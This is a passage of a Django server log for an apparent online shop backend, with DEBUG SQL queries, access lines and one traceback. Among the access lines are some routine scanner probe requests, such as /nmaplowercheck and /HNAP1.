(0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yz192en824xfehc94b183l1tvktxy9jx' LIMIT 1; args=('yz192en824xfehc94b183l1tvktxy9jx',) DEBUG 2019-12-11 04:47:50,300 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yz192en824xfehc94b183l1tvktxy9jx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T04:47:50.298222+00:00'::timestamptz); args=('yz192en824xfehc94b183l1tvktxy9jx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 4, 47, 50, 298222, tzinfo=)) [11/Dec/2019 04:47:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 04:51:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:56:09] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:17:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:24:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:29:34] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:34:38] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:40:35] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:45:38] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [11/Dec/2019 05:50:11] "GET /index.asp HTTP/1.0" 404 6621 [11/Dec/2019 05:51:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 05:51:12,170 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bejgevr8rm1ygqm165mj0s31jws1padj' LIMIT 1; args=('bejgevr8rm1ygqm165mj0s31jws1padj',) DEBUG 2019-12-11 05:51:12,172 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bejgevr8rm1ygqm165mj0s31jws1padj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T05:51:12.171322+00:00'::timestamptz); args=('bejgevr8rm1ygqm165mj0s31jws1padj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 5, 51, 12, 171322, tzinfo=)) [11/Dec/2019 05:51:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 05:51:34] "GET / HTTP/1.0" 302 0 [11/Dec/2019 05:56:37] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:10:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:15:09] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:26:40] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:27:39] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:31:43] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:38:33] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:43:36] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:50:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:53:40] "GET / HTTP/1.0" 302 0 [11/Dec/2019 06:55:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:00:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:07:25] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:12:39] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 07:17:42] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:23:36] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:28:36] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:34:13] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:39:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:47:32] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:47:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 07:47:50,181 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5woyxbtp918g8hqtjrhz5265ymnyl48s' LIMIT 1; args=('5woyxbtp918g8hqtjrhz5265ymnyl48s',) DEBUG 2019-12-11 07:47:50,182 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5woyxbtp918g8hqtjrhz5265ymnyl48s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T07:47:50.181482+00:00'::timestamptz); args=('5woyxbtp918g8hqtjrhz5265ymnyl48s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 7, 47, 50, 181482, tzinfo=)) [11/Dec/2019 07:47:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 07:53:39] "GET / HTTP/1.0" 302 0 [11/Dec/2019 07:58:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 08:01:52,161 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 08:01:52,166 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 08:01:52,168 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 08:01:52,170 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 08:01:52,173 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 08:01:52,175 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 08:01:52,178 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 08:01:52,180 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 08:01:52,182 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 08:01:52,184 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 08:01:52,186 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [11/Dec/2019 08:01:52] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:52] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:53] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:53] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [11/Dec/2019 08:01:53] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [11/Dec/2019 08:04:17] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:12:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:17:18] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:22:21] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:27:24] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:27:53] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:32:27] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:35:49] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:35:59] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:35:59] "GET /nmaplowercheck1576053359 HTTP/1.0" 301 0 [11/Dec/2019 08:35:59] "GET / HTTP/1.0" 302 0 Internal Server Error: /sdk Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/sdk/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [11/Dec/2019 08:36:00] "POST /sdk HTTP/1.0" 500 62902 [11/Dec/2019 08:36:00] "GET /HNAP1 HTTP/1.0" 301 0 Not Found: /evox/about [11/Dec/2019 08:36:00] "GET /evox/about HTTP/1.0" 404 6623 DEBUG 2019-12-11 08:36:02,223 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1'; args=('HNAP1',) Not Found: /HNAP1/ [11/Dec/2019 08:36:02] "GET /HNAP1/ HTTP/1.0" 404 1726 [11/Dec/2019 08:37:30] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:44:43] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:49:46] "GET / HTTP/1.0" 302 0 [11/Dec/2019 08:54:59] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 09:00:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:05:04] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 09:16:25,622 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 09:16:25,632 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 09:16:25,635 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 09:16:25,639 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 09:16:25,642 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 09:16:25,645 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 09:16:25,649 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 09:16:25,652 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 09:16:25,656 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 09:16:25,659 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 09:16:25,663 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [11/Dec/2019 09:16:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-11 09:16:34,080 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 09:16:34,088 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 09:16:34,092 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 09:16:34,095 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 09:16:34,099 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 09:16:34,102 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 09:16:34,106 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 09:16:34,110 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 09:16:34,114 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 09:16:34,118 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 09:16:34,122 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [11/Dec/2019 09:16:34] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-11 09:17:10,843 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 09:17:10,850 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 09:17:10,854 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 09:17:10,858 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 09:17:10,862 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 09:17:10,866 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 09:17:10,870 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 09:17:10,874 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 09:17:10,878 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 09:17:10,882 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 09:17:10,886 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [11/Dec/2019 09:17:10] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [11/Dec/2019 09:20:01] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-11 09:22:20,615 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 09:22:20,624 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 09:22:20,628 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 09:22:20,632 utils 32196 139885050582784 (0.001) 